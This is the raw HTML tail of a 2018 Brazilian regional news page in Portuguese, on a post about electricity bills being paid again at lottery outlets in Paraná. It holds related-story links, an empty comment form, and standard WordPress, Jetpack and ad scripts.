		<a href="http://oiguassu.com/alvaro-dias-lidera-para-presidente-no-sul-empatado-com-bolsonaro/" title="ALVARO DIAS LIDERA PARA PRESIDENTE NO SUL, EMPATADO COM BOLSONARO"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2018/05/bolsonaro-e-alvaro-dias-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2018/05/bolsonaro-e-alvaro-dias-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2018/05/bolsonaro-e-alvaro-dias-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2018/05/bolsonaro-e-alvaro-dias-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2018/05/bolsonaro-e-alvaro-dias-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="7180" data-permalink="http://oiguassu.com/alvaro-dias-lidera-para-presidente-no-sul-empatado-com-bolsonaro/bolsonaro-e-alvaro-dias/" data-orig-file="http://oiguassu.com/wp-content/uploads/2018/05/bolsonaro-e-alvaro-dias.jpg" data-orig-size="700,466" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="bolsonaro-e-alvaro-dias" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2018/05/bolsonaro-e-alvaro-dias-300x200.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2018/05/bolsonaro-e-alvaro-dias.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/parana/" rel="category tag">Paraná</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/alvaro-dias-lidera-para-presidente-no-sul-empatado-com-bolsonaro/" title="ALVARO DIAS LIDERA PARA PRESIDENTE NO SUL, EMPATADO COM BOLSONARO" rel="bookmark">
			ALVARO DIAS LIDERA PARA PRESIDENTE NO SUL, EMPATADO COM BOLSONARO		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-7161 post type-post status-publish format-standard has-post-thumbnail hentry category-internacional tag-cambio tag-dario-messer tag-dolar tag-doleiro tag-foz-do-iguacu tag-interpol tag-lava-jato tag-mpf tag-paraguai tag-paraguay tag-policia-federal tag-swiss-leaks tag-youssef">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/no-paraguai-ninguem-encontra-o-grande-doleiro-da-corrupcao-no-brasil/" title="NO PARAGUAI, NINGUÉM ENCONTRA O GRANDE DOLEIRO DA CORRUPÇÃO NO BRASIL"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2018/05/messer-close-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2018/05/messer-close-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2018/05/messer-close-777x437.jpg 777w, http://oiguassu.com/wp-content/uploads/2018/05/messer-close-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2018/05/messer-close-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2018/05/messer-close-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="7166" data-permalink="http://oiguassu.com/no-paraguai-ninguem-encontra-o-grande-doleiro-da-corrupcao-no-brasil/messer-close/" data-orig-file="http://oiguassu.com/wp-content/uploads/2018/05/messer-close.jpg" data-orig-size="810,636" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="messer close" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2018/05/messer-close-300x236.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2018/05/messer-close.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/internacional/" rel="category tag">Internacional</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/no-paraguai-ninguem-encontra-o-grande-doleiro-da-corrupcao-no-brasil/" title="NO PARAGUAI, NINGUÉM ENCONTRA O GRANDE DOLEIRO DA CORRUPÇÃO NO BRASIL" rel="bookmark">
			NO PARAGUAI, NINGUÉM ENCONTRA O GRANDE DOLEIRO DA CORRUPÇÃO NO BRASIL		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator">		</div><div class="comments-wrap">
<h4 class="comment-section-title"><span class="comment-count">Seja o Primeiro a comentar</span> <span class="comment-count-more">on "CONTAS DE LUZ VOLTARAM A SER PAGAS EM LOTÉRICAS DO PARANÁ DESDE SÁBADO, 05"</span></h4>
</div>
	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Deixe um comentário <small><a rel="nofollow" id="cancel-comment-reply-link" href="/contas-de-luz-voltaram-a-ser-pagas-em-lotericas-do-parana-desde-sabado-05/#respond" style="display:none;">Cancelar resposta</a></small></h3>			<form action="http://oiguassu.com/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<p class="comment-notes">Seu email não será publicado.</p><p class="comment-form-comment"><label for="comment">Comentário</label><br/><textarea id="comment" name="comment" cols="45" rows="5" aria-required="true"></textarea></p><p class="comment-form-author"><label for="author">Name </label><span class="required">*</span><br/><input id="author" name="author" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email </label><span class="required">*</span><br/><input id="email" name="email" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><br/><input id="url" name="url" type="text" value="" size="30" /></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Publicar comentário" /> <input type='hidden' name='comment_post_ID' value='7203' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="0bbc7e343b" /></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_comments" id="subscribe_comments" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-label" for="subscribe_comments">Notifique-me sobre novos comentários por e-mail.</label></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_blog" id="subscribe_blog" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-blog-label" for="subscribe_blog">Notifique-me sobre novas publicações por e-mail.</label></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="89"/></p>			</form>
			</div><!-- #respond -->
		</div>
	<aside class="mh-sidebar">
	<div id="search-2" class="sb-widget clearfix widget_search"><form role="search" method="get" class="search-form" action="http://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form></div><div id="custom_html-7" class="widget_text sb-widget clearfix widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- a -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9260427313362027"
     data-ad-slot="4555141854"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div></aside></div>
</div>
<footer class="mh-footer">
		<div class="wrapper-inner clearfix">
			</div>
	<div class="footer-bottom">
		<div class="wrapper-inner clearfix">
						<div class="copyright-wrap">
				<p class="copyright">
					Copyright 2018 | MH Newsdesk by <a href="http://www.mhthemes.com/" title="Premium Magazine WordPress Themes" rel="nofollow">MH Themes</a>				</p>
			</div>
		</div>
	</div>
</footer>
	<div style="display:none">
	</div>

	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"http:\/\/oiguassu.com\/contas-de-luz-voltaram-a-ser-pagas-em-lotericas-do-parana-desde-sabado-05\/":7203};
	</script>
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201818'></script>
<script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2018Mayaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.9.5'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/comment-reply.min.js?ver=4.9.5'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/wp-embed.min.js?ver=4.9.5'></script>
<script async="async" type='text/javascript' src='http://oiguassu.com/wp-content/plugins/akismet/_inc/form.js?ver=4.0.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/_inc/build/sharedaddy/sharing.min.js?ver=6.1'></script>
<script type='text/javascript'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-twitter', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-google-plus-1', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomgoogle-plus-1', 'menubar=1,resizable=1,width=480,height=550' );
				return false;
			});
</script>
<script type='text/javascript' src='https://stats.wp.com/e-201818.js' async='async' defer='defer'></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:6.1',blog:'12891280',post:'7203',tz:'-3',srv:'oiguassu.com'} ]);
	_stq.push([ 'clickTrackerInit', '12891280', '7203' ]);
</script>
</body>
</html>